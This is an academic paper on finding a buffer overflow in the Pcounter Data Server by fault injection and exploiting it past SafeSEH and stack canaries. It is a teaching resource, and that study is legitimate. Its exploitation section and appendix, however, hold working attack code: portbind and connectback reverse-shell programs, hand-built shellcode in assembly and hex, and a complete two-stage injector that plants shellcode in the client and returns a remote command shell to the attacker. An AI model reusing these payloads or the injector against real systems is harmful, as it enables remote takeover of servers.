Software Vulnerabilities by Example:
A Fresh Look at the Buffer Overflow Problem---
Bypassing SafeSEH

William B. Kimball1 and Saverio Perugini2

1Department of Electrical and Computer Engineering
Air Force Institute of Technology
Wright-Patterson AFB, OH   45433--7765, USA

2Department of Computer Science
University of Dayton
300 College Park
Dayton, OH   45469-2160 USA

wkimball@afit.edu, saverio@udayton.edu

Abstract

We demonstrate how software vulnerabilities compromise the security of a computer system. A variety of everyday applications contain vulnerabilities which may lead to arbitrary remote code execution from unauthorized users. Often, a buffer overflow, an error which arises when a computer program tries to store too much data in memory of a fixed size, provides an easy point of entry. We cover both vulnerability discovery and subsequent exploitation to provide a comprehensive, yet succinct overview of a computer security attack. We use a buffer overflow in the Pcounter Data Server as a running example to understand how systems are compromised. Our discussion of discovery is focused on fault injection---a common technique for identifying buffer overflows. Our exploitation method is an example of a control flow hijacking technique specially crafted to bypass Safe Structured Exception Handling (SafeSEH) and stack canaries---both modern software protection mechanisms.

Keywords: Buffer overflows, Exploitation, Fault Injection, Pcounter Data Server, SafeSEH, Vulnerability Discovery.


Introduction

Computer programs can exhibit a myriad of errors including string-format erros, race conditions, integer overflows, or buffer overflows. Each of these types of errors lend themselves to a variety of discovery techniques. For instance, source-code auditing, binary auditing, and fuzzing are the common techniques for identifying buffer overflows. Only once these errors are discovered and exploited do they become vulnerabilities [3]. Since the Pcounter Data Server, the system used as a running example in this paper, is a closed-source application, we focuses on binary auditing and fuzzing as discovery mechanisms.

Binary auditing is the process of tracing and analyzing the disassembled code of an executable to find insecure assembly code constructs. Fuzzing, on the other hand, an ad-hoc method of discovering vulnerabilities, is used for finding segments of code which are unable to successfully process any possible external input (from the user or from a remote client) [2]. One approach to fuzzing is called fault injection which involves intentionally supplying a program with unexpected input [2]. However, fault injection, due to its ad-hoc nature, is unable to detect all vulnerabilities. In this paper we use fault injection to demonstrate the discovery of a buffer overflow present in the Pcounter Data Server and then discuss ways to exploit the vulnerability.

Discovering a Vulnerability

Overview of Pcontrol

Pcontrol is a server-based, cross-platform printer management tool for Windows and Netware networks from AND Technologies (see http://www.andtechnologies.com). It comes with the Pcounter Data Server (PCNTDATA) and a client program called WBALANCE which queries the server, through DCE/RPC (Distributed Computing Environment / Remote Procedure Calls) over NetBIOS, for a user's balance information in string format. Since simulating an RPC session with the server can be a tedious task, we used a debugger to inject the unexpected data from the client to the server. In our discussion of exploitation below, we write our own program to inject the unexpected data into the client without using a debugger. We also attach a debugger to the server to watch its flow of execution while processing the unexpected input. Every time, save for the first, WBALANCE queries the server for balance information it sends the current balance back to the server for processing. We can attempt to identify a buffer overflow in the server by replacing the currently stored balance, in WBALANCE, with unexpected input before querying the server. The next time WBALANCE queries the server it will send this unexpected input instead of returning the expected reply string received from the server. If the server processes the unexpected input incorrectly, such as overflowing a buffer, a possible vulnerability may exist. This type of attack was first published in [4].

How to Discover a Buffer Overflow

The unexpected inputs traditionally used for fuzzing are oversized buffers. In what follows we illustrate the process of injecting an oversized buffer by searching for the balance in WBALANCE's address space and replacing it with a oversized buffer. We use the OllyDbg debugger---a user-level debugger for MS Windows.

After querying the server for the current balance (see Fig. 1), we search for that balance (in this case "$0.00") in the address space of WBALANCE. Fig. 2 shows that the string $0.00 is stored at address 004101E5h. The current balance is actually stored in multiple locations throughout the address space. Experimentation has demonstrated that the string at this memory location is the only string sent back the server for processing. Therefore, we are only concerned with the string at address 004101E5h.


Figure 1: Popup box displaying the balance string received from the server. Inquiry initiated by double-clicking on the icon in the taskbar.



Figure 2: Memory dump at address 004101E5h of WBALANCE.EXE with the hex (left) and ASCII (right) representations of the balance string circled.

The next step is to replace the balance at address 004101E5h with an oversized string. Fig. 3 shows how to load 256 bytes with FFh into location 004101E5h. Without auditing the disassembly of the Pcounter Data Server for the maximum buffer size we do not know what qualifies as an oversized buffer. We chose to make the size of the buffer 256 bytes with FFh (as shown in Fig. 4) because this is more than a reasonable size for a balance.


Figure 3: Loading 256 bytes in memory location 004101E5h.



Figure 4: Replacing $0.00 with 256 FFh bytes.

The next time WBALANCE queries the Pcounter Data Server it will send the new buffer created above in Fig. 4. By tracing the execution of the Pcounter Data Server after it receives the 256 byte buffer from the client we may discover that the server processes the buffer insecurely. Fig. 5 shows that the server did not successfully process the 256 byte string. An exception was thrown when the server tried to read memory location 00000000h.


Figure 5: Access violation when reading 00000000.

Fig. 6 shows the disassembly of PCNTDATA where the exception was thrown. The opcode at address 0040A08Ah shows that the server tried to compare one byte at address EDI+(EBX*2)+1 against 00h. EBX and EDI(Extended Destination Index) are two of the general-purpose registers used for processing the balance string in memory. The general-purpose registers are used in concert to support string copy operations. At the time of execution, EBX was set to 00000000h and EDI was set to FFFFFFFFh. The server referenced an illegal address, 00000000h, which resulted in the exception thrown.


Figure 6: Disassembly of PCNTDATA starting at address 0040A06Dh.

At this point, our vulnerability discovery has resulted in a denial of service (DoS) against the server. This type of exploit will usually crash the server leaving it unresponsive to further inquiries. If this happens to the Pcounter Data Server, WBALANCE will not function. Our objective is to attain control over the flow of execution using our discovered memory corruption error. In other words, we want to transform our DoS attack into a `control flow hijacking' attack. In Fig. 7, notice that the input we supplied is on the stack and overwrites (i.e., smashes) an exception handler (i.e., function pointer) on the stack. We recognize that SEH (structured exception handling) overwriting is a general technique to bypass software protections (such as stack canaries) which attempt to prevent traditional return address overwrites. In some cases we could use the SEH handler to control execution flow and, thus, execute a malicious payload on the Pcounter Data Server. However, if SafeSEH (another software protection) is being used, we need further techniques to bypass SafeSEH. What follows is an example of an application-specific (i.e. Pcounter Data Server) technique to bypass both stack canary and SafeSEH software protections. We need to investigate how the EDI and EBX registers were set at the time the exception occurred to discern if we can control the flow of execution on the server. We start by tracing the execution of the disassembly (see Fig. 6) at address 0040A071h. The EBP register, another general-purpose register, is set to 00CBFB94h at the time of the exception (see Fig. 5). There was no modification of the EBP register from address 0040A071h to 0040A08Ah. Therefore, the EDI register was set to the DWORD (four bytes) at address 00CBFBA0h. Fig. 7 shows that the four bytes at address 00CBFBA0h are part of the buffer we replaced in the client (see Fig. 4). This explains why the EDI register was set to FFFFFFFFh. We remotely control the value of the EDI register in the Pcounter Data Server by sending an oversized buffer from WBALANCE with the last four bytes set to the value we specify for EDI!


Figure 7: Stack of PCNTDATA at the time the exception was thrown.

The other register we are concerned with at the time the exception is thrown is EBX. The opcode sub at address 0040A074h subtracts EBX with itself, which simply sets EBX to zero. Next, the byte at address 00CBFBA4h is moved into the low byte of EBX. The byte at this address is always the terminating null byte of the string we supplied to the server. In other words, the low byte of EBX will always be set to zero. The only other opcode that modifies EBX before the exception is LEA (Load Effective Address). Since EBX is always 00000000h and will be loaded at address 0040A087 with address [EBX+EBX*2], EBX will always be set to 00000000h.

The CALL DWORD PTR DS:[EDI+EBX*2+2] at address 0040A097his used to change the next address of execution by updating the EIP register (i.e., instruction pointer). Since we have control over the value of the EDI register, and the EBX register will always be zero, we also have control of the EIP register and can change the flow of execution on the server by supplying an address for the EDI register from WBALANCE! This concludes how to discover a buffer overflow in the Pcounter Data Server which leads to remote code execution. The following section illustrates how we can remotely executing shellcode on the server.

Exploiting a Vulnerability

There are no standard methods to write an exploit, a computer program which takes advantage of a bug. The code usually needs to be written to target a specific hardware or software platform [1]. Moreover, we must consider other constraints such as payload size and filters. Before the buffer sent to the Pcounter Data Server gets insecurely processed, it is modified by the tolower() function which converts all bytes from 41h-5Ah to 61h-7Ah. Because of this filter we must write all of our shellcode without using 41h through 7Ah [2]. `Writing an exploit for certain buffer overflow vulnerabilties can be problematic because of the filters that may be in place; for example, a vulnerable program may allow only alphanumeric characters from A to Z (41h to 5Ah), a to z (61h to 7Ah and 0 to 9 (30h to 39h)' [2].

The payload is the portion of an exploit which is executed because of a vulnerability. It is often malicious and intended to perform a specific function such as spawning a shell or adding administrator accounts to a system. The most popular type of payload, called shellcode, involves creating a command shell. It is easy to create a command shell using C in the Windows programming environment. For instance, call the Windows API function CreateProcess()} as shown in Table 1.

Table 1: C code to spawn a shell.
#include <windows.h>

void main() {
   STARTUPINFO si;
   PROCESS_INFORMATION pi;
 
   memset (&si, 0, sizeof (STARTUPINFO));
   memset (&pi, 0, sizeof (PROCESS_INFORMATION));

   si.cb = sizeof (STARTUPINFO);

   CreateProcess (O, "cmd", 0, 0, 0, 0, 0, 0, &si, &pi);
}

While this code spawns a shell on the local system, we cannot interact with it remotely. The common methods of interacting with a shell remotely use portbind shellcode or connectback shellcode. Portbind shellcode spawns a shell with its standard input and output redirected to a listening socket. Similarly, connectback shellcode spawns a shell with its standard input and output bound to a socket, but unlike portbind shellcode, it connects back to another socket listening on the client rather than listening for incoming connections. Executing connectback shellcode is more common when a firewall resides between the client and server. Table 9 provides an example of portbind shellcode and Table 3 presents an example of connectback shellcode.

Table 2: Sample portbind shellcode in C.
#include <windows.h>
#include <winsock2.h>
#define PORT 5555

#pragma comment (lib, "ws2_32.lib")

void main() {
   STARTUPINFO si;
   PROCESS_INFORMATION pi;
   WSADATA wsdatal
   SOCKET listSock, acceptSock;
   SOCKADDR_IN sa, saa;
   int sizeSOCKADDR = sizeof (SOCKADDR);
 
   WSAStartup (MAKEWORD (2, 2), &wsdata);

   sa.sin_addr.s_addr = INADDR_ANY;
   sa.sin_port = htons (PORT);;
   sa.sin_family = AF_INET;

   listSock = WSASocket (2, 1, 0, 0, 0, 0);

   bind (listSock, (SOCKADDR*) &sa, sizeof (SOCKADDR));

   listen (listSock, 1);

   acceptSock = accept (listSock, (SOCKADDR*) &saa, &sizeSOCKADDR);

   memset (&si, 0, sizeof (STARTUPINFO));
   memset (&pi, 0, sizeof (PROCESS_INFORMATION));

   si.cb = sizeof (STARTUPINFO);
   si.dwFlags = STARTF_USESTDHANDLES;
   si.hStdInput = (HANDLE) acceptSock;
   si.hStdOuput = (HANDLE) acceptSock;
   si.hStdError = (HANDLE) acceptSock;

   CreateProcess (O, "cmd", 0, 0, 1, CREATE_NEW_CONSOLE, 0, 0, &si, &pi);
}


Table 3: Sample connectback shellcode in C.
#include <windows.h>
#include <winsock2.h>
#define PORT 5555
#define IP "127.0.0.1"

#pragma comment (lib, "ws2_32.lib")

void main() {
   STARTUPINFO si;
   PROCESS_INFORMATION pi;
   WSADATA wsdata;
   SOCKET sock;
   SOCKADDR_IN sa;
 
   WSAStartup (MAKEWORD (2, 2), &wsdata);

   sa.sin_addr.s_addr = inet_addr (IP);
   sa.sin_port = htons (PORT);;
   sa.sin_family = AF_INET;

   sock = WSASocket (2, 1, 0, 0, 0, 0);

   connect (sock, (SOCKADDR*) &sa, sizeof (SOCKADDR));

   memset (&si, 0, sizeof (STARTUPINFO));
   memset (&pi, 0, sizeof (PROCESS_INFORMATION));

   si.cb = sizeof (STARTUPINFO);
   si.dwFlags = STARTF_USESTDHANDLES;
   si.hStdInput = (HANDLE) sock;
   si.hStdOuput = (HANDLE) sock;
   si.hStdError = (HANDLE) sock;

   CreateProcess (O, "cmd", 0, 0, 1, CREATE_NEW_CONSOLE, 0, 0, &si, &pi);
}

Fig. 7 shows only 80 bytes of the buffer sent to the server stored on the stack at the time that we control the instruction pointer. Therefore, only 76 bytes are available for shellcode; recall that four bytes are required for setting the EDI register. Due to this size limitation, we use connectback shellcode which requires less memory than the portbind shellcode. We must translate the connectback shellcode (Table 3) to assembly and then into hexadecimal form because we can only replace the $0.00 string with ASCII, UNICODE or HEX (c.f., Fig. 3).

Since it is safe to assume that the Windows Sockets Library (WinSock) is initialized on the server, we can omit the call to WSAStartup() (which initializes WinSock) in our shellcode. To complete the shellcode, we call WSASocket(), connect(), and CreateProcess().

Most Windows API functions which process characters are actually two functions: one appended with an A (for ASCII) and the other appended with a W (for wide character, i.e., Unicode). Usually the compiler selects which function to link depending on the type of character format used. The functions WSASocketA() and connect() are imported from ws2_32.dll and CreateProcessA() is imported from kernel32.dll. The addresses of these three functions are unique to the version and service pack for every Windows operating system. Here, we hardcode the addresses for these functions in our shellcode to run on Windows XP SP2. Writing shellcode to run on any Windows OS and service pack is beyond the scope of this paper and requires more memory than available to write shellcode for this exploit. Stuttard researched how to write small-OS-independent shellcode which still requires 191 bytes for portbind shellcode [5]. Because we only have 76 bytes we cannot use the techniques in [5]. The export address used to call each function is 71AB8769h for WSASocketA(), 71AB406Ah for connect() and 7C802367h for CreateProcessA(). Table 4 shows the C, Intel assembly, and hexadecimal equivalents for calling each of the functions needed to build the shellcode.


Table 4: C, Intel assembly, and hexadecimal equivalents.
C Intel Assembly Hexadecimal
sock = WSASocket (AF_INET, 2, 0, 0, 0, 0);

/* sock will be stored in the eax register
   when the call to WSASocket() returns */
xor	eax, eax
push	eax
push	eax
push	eax
push	eax
inc	eax
push	eax
inc	eax
push	eax
mov	ebx, 0x71ab8769
call	ebx
31 C0
50
50
50
50
40
50
40
50
BB 69 87 AB 71
FF D3
SOCKADDR_IN sa;

sa.sin_addr.s_addr = inet_addr ("127.1.1.1");
sa.sin_port             = htons (5555);
sa.sin_family         = AF_INET;

connect (sock, (SOCKADDR*) &sa, sizeof (SOCKADDR));
mov	ebx, 0x0101017f
push	ebx
mov	ebx, 0x4ceafffd
not	ebx
push	ebx
mov	ecx, esp
mov	esi, eax
push	0x10
push	ecx
push	eax
mov	ebx, 0x71ab406a
call	ebx
BB 7F 01 01 01
53
BB FD FF EA 4C
F7 D3
53
89 E1
89 C6
6A 10
51
50
BB 6A 40 AB 71
FF D3
memset (&si, 0, sizeof (STARTUPINFO));
memset (&pi, 0, sizeof (PROCESS_INFORMATION));

si.cb		= sizeof(STARTUPINFO);
si.dwFlags		= STARTF_USESTDHANDLES;
si.hStdInput	= (HANDLE)sock;
si.hStdOutput	= (HANDLE)sock;
si.hStdError	= (HANDLE)sock;

CreateProcess(0, "CMD", 0, 0, 1, CREATE_NEW_CONSOLE, 0, 0, &si, &pi);
xor	ecx, ecx
mov	cl, 0x54
sub	esp, ecx
mov	edi, esp
push	edi
xor	eax, eax
rep	stosb
pop	edi
mov	byte [edi], 0x44
inc	byte [edi], 0x2d
push	edi
mov	eax, esi
lea	edi, [edi+0x38]
stosd
stosd
stosd
pop	edi
xor	eax, eax
lea	esi, [edi+0x44]
push	esi
push	edi
push	eax
push	eax
push	eax
inc	eax
push	eax
dec	eax
push	eax
push	eax
mov 	ecx, 'addr of cmd'
not	ecx
push	ecx
push	eax
mov 	ecx, 0x7c802367
call	ecx               	
        db"CMD",0
31 C9
B1 54
29 CC
89 E7
57
31 C0
F3 AA
5F
C6 07 44
FE 47 2D
57
89 F0
8D 7F 38
AB
AB
AB
5F
31 C0
8D 77 44
56
57
50
50
50
40
50
48
50
50
B9 'addr of cmd'
F7 D1
51
50
B9 67 23 80 7C
FF D1

The hexadecimal equivalents shown in Table 4 require 106 bytes. Since we are limited to 76 bytes, we must decrease the size of our shellcode. We apply a two-stage shellcode attack where the first-stage shellcode sent to the server only calls socket(), connect(), and recv() and the second-stage shellcode spawns the shell. The first-stage shellcode only requires 63 bytes of code (see Table 5). The second-stage shellcode (i.e., the actual payload) is sent to the server when it connects back to the client. After recv() returns the first-stage shellcode should immediately call the address of the buffer supplied to recv() to execute the second-stage payload.


Table 5: Two-stage C, Intel assembly, and hexadecimal equivalents.
C Intel Assembly Hexadecimal
sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);

/* sock will be stored in the eax register
   when the call to socket() returns */

xor	eax, eax
push	eax
inc	eax
push	eax
inc	eax
push	eax
mov	ebx, 0x71AB3B91
call	ebx
31 C0
50
40
50
40
50
BB 91 3B AB 71
FF D3
SOCKADDR_IN sa;

sa.sin_addr.s_addr = inet_addr ("127.1.1.1");
sa.sin_port             = htons (5555);
sa.sin_family         = AF_INET;

connect (sock, (SOCKADDR*) &sa, sizeof(SOCKADDR));
mov	ebx, 0x0101017f
push	ebx
mov	ebx, 0x4ceafffd
not	ebx
push	ebx
mov	ecx, esp
mov	esi, eax
push	0x10
push	ecx
push	eax
mov	ebx, 0x71ab406a
call	ebx
BB 7F 01 01 01
53
BB FD FF EA 4C
F7 D3
53
89 E1
89 C6
6A 10
51
50
BB 6A 40 AB 71
FF D3
recv (sock, 'addr of foo()',
   'use address of recv as size to decrease shellcode size', 0);
foo();

/* using the address of recv as the buffer size
   helps decrease the shellcode size; it is safe
   to assume that the size of the buffer sent to
   the server will not be greater than 0x71AB615A,
   which is 1,907,056,986 bytes! */
xor	edx, edx
push	edx
mov	ecx, 'addr of foo()'
mov	ebx, 0x71AB615A
push	ebx
push	ecx
push	eax
call	ebx
call	ecx
31 D2
52
B9 'addr of foo()'
BB 5A 61 AB 71
50
53
50
FF D3
FF D1

Tables 1 and 2 contain the code snippets we need to build our two-stage shellcode. While it is possible to manually replace the memory shown in Fig. 4 with our shellcode, it is not practical every time we exploit the server. Instead we build an application to automatically inject the payload. In the Appendix, we provide the source code for building the Pcounter exploit payload injector (i.e., pei; c.f., Fig. 11) to automate the process of exploiting the server without simulating an authentic RPC session to the Pcounter Data Server. The program accepts a process id (PID), two IP addresses, and two port numbers. There are separate IP addresses and ports for the two different stages of the attack. Together they represent the addresses and ports used to connect back from the server. The PID passed to pei needs to be WBALANCE. In the example below, Figs. 11 and 12, pei listens on port 4444 for the first-stage payload to connectback to it. pei will automatically send the second-stage shellcode to the server after it receives a connection. Netcat or another program should listen on port 5555 for the second-stage payload to connectback with the final remote shell.




Figure 11: Exploiting the Pcounter Data Server



Figure 12: Netcat listing on port 5555.

Conclusion

We have demonstrated how to discover a vulnerability in the Pcounter Data Server using fault injection and write an exploit against it leading to remote-code execution. New techniques, in addition to stack canaries and SafeSEH, continue to be developed to protect applications while attackers continue to develop bypassing techniques to exploit those same applications. Until formal methods improve to be able to prove the correctness of complex software, vulnerabilities will continue to exist, and computer systems will continue to be compromised.

References

About the Authors

William B. Kimball is a Ph.D. student in the Department of Electrical and Computer Engineering at the Air Force Institute of Technology in Dayton, OH. His research interests are program analysis, symbolic model checking, and formal verification. Kimball has a B.S. in Computer Science from the University of Dayton (2006). He can be reached at wkimball@afit.edu.

Saverio Perugini is an Associate Professor in the Department of Computer Science at the University of Dayton. His research interests are programming languages and interactive information retrieval. Perugini regularly teaches courses in operating systems, systems programming, and programming languages. He can be reached at saverio@udayton.edu.

Appendix

#include <stdlib.h>
#include <stdio.h>
#include <winsock2.h&ht;

#pragma comment(lib, "ws2_32.lib")

//************************STAGE 1 shellcode****************************

char s1_shellcode[] =
   "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
   "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
   "\x53"                  //push   ebx
   "\x43"                  //inc    ebx
   "\x53"                  //push   ebx
   "\x43"                  //inc    ebx
   "\x53"                  //push   ebx
   "\xB8\x60\xc4\x54\x8e"  //mov    eax, 0x8e54c460
   "\xf7\xd0"              //not    eax               ;0x71ab3b91
   "\x83\xe8\x0e"          //sub    eax, e
   "\xff\xd0"              //call   eax               ;socket
   "\xbb\x7f\x01\x01\x01"  //mov    ebx, 0x0101017f   ;ip address
   "\x53"                  //push   ebx
   "\xbb\xfd\xff\xee\xa3"  //mov    ebx, 0xa3eefffd   ;port
   "\xf7\xd3"              //not    ebx               ;0x5c110002
   "\x53"                  //push   ebx
   "\x83\xc6\x10"          //add    esi, 0x10
   "\x89\xe3"              //mov    ebx, esp
   "\x56"                  //push   esi
   "\x53"                  //push   ebx
   "\x89\xc7"              //mov    edi, eax
   "\x50"                  //push   eax
   "\xbb\x95\xbf\x54\x8e"  //mov    ebx, 0x8e54bf95
   "\xf7\xd3"              //not    ebx               ;0x71ab406a
   "\xff\xd3"              //call   ebx               ;connect
   "\x31\xd2"              //xor    edx, edx
   "\x52"                  //push   edx
   "\xb9\xa5\x9e\x54\x8e"  //mov    ecx, 0x8e549ea5   ;recv and buffer size
   "\xf7\xd1"              //not    ecx               ;0x71ab615a
   "\x57"                  //push   edi            
   "\xbb\x5f\x04\x34\xff"  //mov    ebx, 0xff78045f
   "\xf7\xd3"              //not    ebx               ;0x00b8fba0
   "\x53"                  //push   ebx
   "\x57"                  //push   edi
   "\xff\xd1"              //call   ecx               ;recv
   "\xff\xd3"              //call   ebx               ;stage 2 s2_shellcode

//*********************************************************************
   "\xeb\xb4"              //jmp to beginning of s2_shellcode
   "\x9e\xfb\xcb\x00";     //EDI (EDI + 2 points to value for EIP in s1_shellcode)

//************************STAGE 2 shellcode****************************

unsigned char s2_shellcode[] =
   "\x31\xC0"              //xor    eax, eax
   "\x50"                  //push   eax
   "\x50"                  //push   eax
   "\x50"                  //push   eax
   "\x50"                  //push   eax
   "\x40"                  //inc    eax
   "\x50"                  //push   eax
   "\x40"                  //inc    eax
   "\x50"                  //push   eax
   "\xBB\x69\x87\xAB\x71"  //mov    ebx, 0x71ab8769
   "\xFF\xD3"              //call   ebx
   "\xBB\x7F\x01\x01\x01"  //mov    ebx, 0x0101017f
   "\x53"                  //push   ebx
   "\xbb\xfd\xff\xea\x4c"  //mov    ebx, 0x4ceafffd
   "\xf7\xd3"              //not    ebx
   "\x53"                  //push   ebx
   "\x89\xe1"              //mov    ecx, esp
   "\x89\xc6"              //mov    esi, eax
   "\x6A\x10"              //push   0x10
   "\x51"                  //push   ecx
   "\x50"                  //push   eax
   "\xBB\x6A\x40\xAB\x71"  //mov    ebx, 0x71ab406a
   "\xFF\xD3"              //call   ebx
   "\x31\xC9"              //xor    ecx, ecx
   "\xB1\x54"              //mov    cl, 0x54
   "\x29\xCC"              //sub    esp, ecx
   "\x89\xE7"              //mov    edi, esp
   "\x57"                  //push   edi
   "\x31\xC0"              //xor    eax, eax
   "\xF3\xAA"              //rep    stosb
   "\x5F"                  //pop    edi
   "\xC6\x07\x44"          //mov    byte [edi], 0x44
   "\xFE\x47\x2D"          //inc    byte [edi], 0x2d
   "\x57"                  //push   edi
   "\x89\xF0"              //mov    eax, esi
   "\x8D\x7F\x38"          //lea    edi, [edi+0x38]
   "\xAB"                  //stosd
   "\xAB"                  //stosd
   "\xAB"                  //stosd
   "\x5F"                  //pop    edi
   "\x31\xC0"              //xor    eax, eax
   "\x8D\x77\x44"          //lea    esi, [edi+0x44]
   "\x56"                  //push   esi
   "\x57"                  //push   edi
   "\x50"                  //push   eax
   "\x50"                  //push   eax
   "\x50"                  //push   eax
   "\x40"                  //inc    eax
   "\x50"                  //push   eax
   "\x48"                  //dec    eax
   "\x50"                  //push   eax
   "\x50"                  //push   eax
   "\xb9\xf2\x03\x34\xFF"  //mov    ecx, 0xff7803f2
   "\xf7\xd1"              //not    ecx
   "\x51"                  //push   ecx
   "\x50"                  //push   eax
   "\xb9\x67\x23\x80\x7c"  //mov    ecx, 0x7c802367
   "\xff\xd1"              //call   ecx
   "\xff\xff"
   "CMD\x00";

//*********************************************************************

int main (int argc, char** argv) {

   HANDLE handle;
   SOCKADDR_IN sa_cb, service;
   WSADATA ws;
   SOCKET ListenSocket, AcceptSocket;

   if (argc != 6) {
      printf("usage: <pid> <s1 ip> <s1 port> <s2 ip> <s2 port>\n");
      exit(1);
   }

   // setup WinSock
   WSAStartup(MAKEWORD(2, 2), &ws);

   if ((handle = OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_WRITE , 1,
      atoi(argv[1]))) == NULL) {
         printf("Failed to open process: %d\n", atoi(argv[1]));
         exit(1);
      }

   //set stage 1 port in s1_shellcode
   s1_shellcode[128] = (BYTE)~(atoi(argv[3])>>8);
   s1_shellcode[129] = (BYTE)~atoi(argv[3]);

   //set stage 1 ip address in s1_shellcode
   sa_cb.sin_addr.s_addr = inet_addr(argv[2]);
   s1_shellcode[120] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b1;
   s1_shellcode[121] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b2;
   s1_shellcode[122] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b3;
   s1_shellcode[123] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b4;

   if (!WriteProcessMemory(handle, (LPVOID)0x4101EA, s1_shellcode,
       strlen(s1_shellcode)+1, NULL)) {
         printf("Failed to inject the s1_shellcode.\n");
         exit(1);
   }

   printf("Injecting stage 1 shellcode into WBALANCE.\n");

   if ((ListenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) ==
        INVALID_SOCKET) {
      printf("Error creating socket(): %ld\n", WSAGetLastError());
      WSACleanup();
      exit(1);
   }

   service.sin_family = AF_INET;
   service.sin_addr.s_addr = INADDR_ANY;
   service.sin_port = htons(atoi(argv[3]));
  
   if (bind(ListenSocket, (SOCKADDR*) &service, sizeof(service)) ==
       SOCKET_ERROR) {
      printf("bind() failed.\n");
      closesocket(ListenSocket);
      exit(1);
   }

   if (listen(ListenSocket, 1) == SOCKET_ERROR) {
      printf("Error listening on socket.\n");
      exit(1);
   }
   
   printf("Listening for stage 1 shellcode on port %s\n", argv[3]);
   
   AcceptSocket = SOCKET_ERROR;
   while( AcceptSocket == SOCKET_ERROR )
      AcceptSocket = accept(ListenSocket, NULL, NULL);

   printf("Connected!\n");

   //set stage 2 port in s2_shellcode
   s2_shellcode[26] = (BYTE)~(atoi(argv[5])>>8);
   s2_shellcode[27] = (BYTE)~atoi(argv[5]);

   //set stage 2 ip address in s2_shellcode
   sa_cb.sin_addr.s_addr = inet_addr(argv[4]);
   s2_shellcode[18] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b1;
   s2_shellcode[19] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b2;
   s2_shellcode[20] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b3;
   s2_shellcode[21] = (BYTE)sa_cb.sin_addr.S_un.S_un_b.s_b4;
   
   printf("Sending stage 2 shellcode.\n");
   printf("Check for shell on port %s\n", argv[5]);

   send(AcceptSocket, (char*)s2_shellcode, sizeof(s2_shellcode), 0);
   
   closesocket(ListenSocket);
   closesocket(AcceptSocket);
   WSACleanup();

   return 0;
}